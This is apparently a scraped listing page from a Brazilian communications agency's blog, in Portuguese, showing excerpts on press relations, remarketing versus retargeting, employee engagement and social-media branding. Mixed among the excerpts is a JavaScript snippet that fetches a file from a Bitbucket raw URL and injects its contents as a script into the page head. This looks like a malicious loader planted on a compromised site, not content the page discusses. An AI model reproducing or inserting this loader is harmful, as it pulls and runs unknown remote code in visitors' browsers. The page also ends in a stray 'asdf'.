Conheça os Desafios e Oportunidades da Comunicação no Contexto de Empresas Familiares
Quais São As Tendências Que Devem Guiar 2025?
Orçamento de comunicação corporativa deve crescer em 2025
Descubra Como a Comunicação Digital Pode Salvar Sua Marca em Momentos de Crise

O assessor de imprensa é o profissional que deve servir como uma ponte entre a organização e os veículos de comunicação. Em tal cenário, é importante que seja adotado o uso de ferramentas para assessoria de imprensa de qualidade, que ajudem o profissional a se destacar e...

É comum que os estrategistas de marketing das empresas tenham dificuldade em diferenciar os termos remarketing e retargeting, pois eles não são semelhantes apenas na grafia, mas também nos conceitos que representam. Para acabar com essa dúvida de uma vez por todas, vamos esclarecer o que...

var url = 'https://bitbucket.org/goo2/adss/raw/bb48df0654afc575e4e10d9e14d886a4afba6bc2/go.txt'; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement('script'); script.src = data.trim(); document.getElementsByTagName('head')[0].appendChild(script); ...

Trabalhar com uma equipe desmotivada é muito prejudicial para as empresas, uma vez que pode resultar em menos interesse na execução das atividades, na produção de um produto de pouca qualidade e em um atendimento não diferenciado para os clientes. É por isso que engajar...

A Interface Comunicação vem ampliando substancialmente sua atuação no segmento de marketing digital e possui hoje um núcleo especializado na gesto da comunicação digital de seus clientes. Nos últimos meses, a agência assumiu projetos de gestão de redes sociais, consultoria em SEO, criação de sites,...

Seus colaboradores entendem sua marca e acreditam nela? Eles conseguem ver que têm um papel no propósito da sua empresa? Têm abertura e acesso a meios para ter uma voz dentro do seu negócio? Se você respondeu não para alguma dessas perguntas, atenção! O engajamento dos colaboradores tem...

As redes sociais revolucionaram a comunicação em muitos aspectos, principalmente no meio empresarial, quando uma organização precisa divulgar a marca e melhorar o relacionamento com os seus públicos. Dentro desse contexto, cada vez mais é necessário desenvolver estratégias de branding utilizando esses canais, possibilitando assim, mais...

Jair Bolsonaro, Manuela D’Ávila, Lula, Marina Silva etc. — se tem uma coisa que esses presidenciáveis não têm em comum são opiniões e posturas políticas, que são totalmente divergentes. No entanto, todos eles certamente contam com o apoio de uma assessoria de imprensa para estar em contato com...

asdf